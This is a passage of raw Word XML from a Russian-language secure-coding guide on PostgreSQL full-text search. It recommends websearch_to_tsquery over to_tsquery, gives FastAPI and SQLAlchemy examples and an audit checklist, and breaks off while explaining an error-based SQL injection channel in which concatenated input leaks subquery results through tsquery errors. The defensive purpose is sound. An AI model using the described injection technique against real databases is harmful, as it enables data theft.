          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">query = text("""</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websearch_to_tsquery('english', :q)</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bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Migration никак не ломает API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, потому что: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Простой keyword search (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">q=admin dashboard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) работает одинаково в обеих функциях (AND-аются терминалы).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Existing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</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-operators в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от старых клиентов больше </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не парсятся</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — клиенты получат narrowed result set, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не ERROR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Если приложение ранее decompose-вал user-input на validated tokens (Variant 3.15.2 «как выглядит легитимное»), server-side built tsquery остаётся через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legitimate use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и не подлежит migration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Когда использовать какую функцию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Сценарий</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Функция</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User-input через query parameter, простой keyword search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plainto_tsquery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User-input, Google-style UX (phrase quotes, negation, OR)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`websearch_to_tsquery`</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (рекомендация)</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User-input, требуется именно phrase-only поиск</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phraseto_tsquery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Server-side built query из validated tokens + boolean toggle UI</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to_tsquery</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (3.15.2 «легитимное»)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User-input + advanced expert search-syntax (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">AND</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">OR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">NEAR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preser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НЕ передавать в `to_tsquery` напрямую</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — построить из tokens через build_tsquery (3.15.2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Расширенные защитные шаблоны</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для эндпоинтов, где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недоступен (PG ≤ 10) или где нужна валидация input length:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/articles/search")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search_articles(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    q: str = Query("", min_length=1, max_length=200),</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PG 8.3+: plainto_tsquery как default safe-альтернатива</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title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plainto_tsquery('english', :q)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          AND status = 'published'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY ts_rank(search_vector, plainto_tsquery('english', :q)) DESC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT 50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{"q": q})</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return [...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">max_length=200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — soft DoS-mitigation против огромных query string.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гарантирует, что operators не parsing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сложный случай: SQLAlchemy ORM с tsquery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">from sqlalchemy import func, select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ORM-эквивалент: websearch_to_tsquery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">stmt = select(Article).where(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    Article.search_vector.op("@@")(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        func.websearch_to_tsquery("english", q)</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).order_by(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    func.ts_rank(Article.search_vector, func.websearch_to_tsquery("english", q)).desc()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">).limit(50)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">func.websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> корректно делает bind-параметризацию + использует безопасную функцию. ORM-уровень предпочтителен для нового кода.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Признаки правильной защиты</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Кодовый аудит на этой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Все `to_tsquery(...:user_var)`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> должны быть либо (1) заменены на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либо (2) подтверждены как server-side built из validated tokens (см. 3.15.2 «легитимное»).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Любой `to_tsquery` от endpoint-а search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — кандидат на review. Если signature </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">to_tsquery(:q)</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to_tsquery('lang', :q)</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 direct user-input, это уязвимость 3.15.2.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Никаких concat в первом аргументе `to_tsquery`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to_tsquery(... || :input)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это уже 3.15.4 (error-based extraction через injected SQL до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доступна с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 8.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (декабрь 2007). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phraseto_tsquery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">9.6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (сентябрь 2016).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 с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (октябрь 2018). Не CVE — feature.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3.15.2 to_tsquery операторы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — что мы защищаем; миграция отсюда.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3.15.4 tsquery как error-based канал</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устраняет syntax-error → нет error-based channel.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3.15.1 LIKE wildcards</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — параллельная категория с собственной защитой (escape).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5.1 Параметризованные запросы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий принцип «bind + правильная функция», 3.15.3 — частный случай.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рекомендация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как default для search-эндпоинтов.</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«Text Search Functions and Operators» — https://www.postgresql.org/docs/current/textsearch-controls.html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11 Release Notes: «New text search function» — https://www.postgresql.org/docs/release/11.0/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(введение и semantics) — https://www.postgresql.org/docs/current/functions-textsearch.html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pganalyze blog: «Full Text Search in PostgreSQL: A guide» — https://pganalyze.com/blog/postgres-full-text-search-guide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SQLAlchemy Docs: «Full Text Search» — https://docs.sqlalchemy.org/en/20/dialects/postgresql.html#full-text-search</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.15.4 tsquery как error-based канал</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to_tsquery(text)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> при невалидном input возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: syntax error in tsquery: "&lt;leaked-input&gt;"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">полным содержимым input в text ошибки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Если приложение строит первый аргумент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через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">concatenation с user-input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (антипаттерн), атакующий может </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">подложить SQL-subquery, который вернёт extraction target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (password, internal data) — результат subquery станет частью malformed tsquery-input → попадёт в error message → leaked в HTTP response. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">классический error-based канал</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (тот же класс, что 3.2 error-based via CAST), но source error —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парсер вместо CAST. Особенность: канал работает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
